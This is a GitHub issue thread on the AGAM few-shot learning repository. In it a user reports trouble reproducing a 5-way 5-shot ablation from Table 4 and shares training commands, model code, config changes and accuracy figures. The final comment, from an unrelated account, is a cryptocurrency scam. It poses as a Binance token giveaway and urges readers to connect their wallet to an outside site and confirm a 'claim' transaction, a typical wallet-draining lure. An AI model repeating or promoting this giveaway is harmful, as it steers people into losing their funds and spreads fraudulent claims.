### ISSUE TITLE
Question on reproduce the 5-way 5-shot result in Table 4

### ISSUE THREAD

**Issue by e96031413** [bighuang624/AGAM#4]
![table4](https://user-images.githubusercontent.com/30921855/124896161-c8a01e00-e00f-11eb-97e0-44a16efc6e52.JPG)

Hello, I try to reproduce the result in Table4 (5-way 1-shot and 5-way 5-shot)

I can achieve expected performance in 5-way 1-shot setting.(in Table4, 5-way 1-shot)

```bash
# AGAM not using attributes (5-way 5-shot)
CUDA_VISIBLE_DEVICES=2 python train_wo_attribute.py --train-data cub --test-data cub --backbone conv4 --num-shots 5 --semantic-type class_attributes --num-workers 8 --batch-tasks 2 --lr 0.001
```

However, when I changed to 5-way 5-shot setting, I found that "the test accuracy of not using attributes is better than full AGAM", which is different from the the Table4.

```bash
# AGAM with full attribute (5-way 5-shot)
CUDA_VISIBLE_DEVICES=2 python train.py --train-data cub --test-data cub --backbone conv4 --num-shots 5 --semantic-type class_attributes --num-workers 8 --batch-tasks 2 --lr 0.001
```

Should I further modify the source code? or I miss something?

**Comment by bighuang624** [comment]
@e96031413 

Sorry, I just saw this feedback. I don't know how you implemented `train_wo_attribute.py`, nor do I know the specific results you got, so I don't have an answer at the moment. Can you provide some details to facilitate our inspection?

**Comment by e96031413** [comment]
Hi, I implemented ```train_wo_attribute.py``` with the following code you provided in [previous issue](https://github.com/bighuang624/AGAM/issues/3#issuecomment-846895178)
```
CUDA_VISIBLE_DEVICES=1 python train_wo_attribute.py --train-data cub --test-data cub --backbone conv4 --num-shots 5 --semantic-type class_attributes --num-workers 8 --batch-tasks 2 --lr 0.001
```
```python
class ProtoNetAGAMwoAttr(nn.Module):
    def __init__(self, backbone, semantic_size, out_channels):
        super(ProtoNetAGAMwoAttr, self).__init__()
        self.encoder = get_backbone(backbone)

        self.ca_block = CABlock(out_channels)
        self.sa_block = SABlock()

    def forward(self, inputs):

        embeddings = self.encoder(inputs.view(-1, *inputs.shape[2:]))
        ca_embeddings, ca_weights = self.ca_block(embeddings)
        embeddings = ca_embeddings
        sa_embeddings, sa_weights = self.sa_block(embeddings)
        embeddings = sa_embeddings

        return embeddings.view(*inputs.shape[:2], -1)
```
Also, I did a experiment to compare the performance between 1 attribute and 9 attribute, the result showed that 1 attribute is similar to 9 attribute.

Here I provide the steps I use to produce the experiment result(1 attribute and 9 attribute follows the same steps):
* Modify Line 100 in AGAM/global_utils.py, ```semantic_size_list.append(1)```
* Modify AGAM/torchmeta/datasets/semantic.py
```
class CUBClassDataset(ClassDataset):
    folder = 'cub'

    # Google Drive ID from http://www.vision.caltech.edu/visipedia-data/CUB-200-2011/CUB_200_2011.tgz
    gdrive_id = '1hbzc_P1FuxMkcabkgn9ZKinBwW683j45'
    tgz_filename = 'CUB_200_2011.tgz'
    tgz_md5 = '97eceeb196236b17998738112f37df78'
    image_folder = 'CUB_200_2011/images'

    filename = '{0}_data.hdf5'
    filename_labels = '{0}_labels.json'

    assets_dir = 'assets'
    text_dir = 'text_c10'
    attribute_dir = 'attributes'
    # class_attribute_filename_labels = 'class_attribute_labels_continuous.txt'
    class_attribute_filename_labels = 'class_attribute_labels_continuous_first_1_attribute.txt' 
    image_id_name_filename = 'images.txt'
    # image_attribute_filename_labels = 'image_attribute_labels.txt'
    image_attribute_filename_labels = 'image_attribute_labels_first_1_attribute.txt'
    classes_filename = 'classes.txt'
    attributes_dim = 1
```
* I create the 'class_attribute_labels_continuous_first_1_attribute' and 'image_attribute_labels_first_1_attribute.txt' with the original file, select the first 1 attribute in each txt file
* Training with the command ```CUDA_VISIBLE_DEVICES=2 python train.py --train-data cub --test-data cub --backbone conv4 --num-shots 5 --semantic-type class_attributes --num-workers 8 --batch-tasks 2 --lr 0.001```

The test acc for 5 shot 1 attribute is 81.18
The test acc for 5 shot 9 attribute is 81.08
The test acc for 5 shot without attribute is 81.7
However, when it comes to 5 shot 312 attribute(original setting in paper), the test acc is 77.96

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
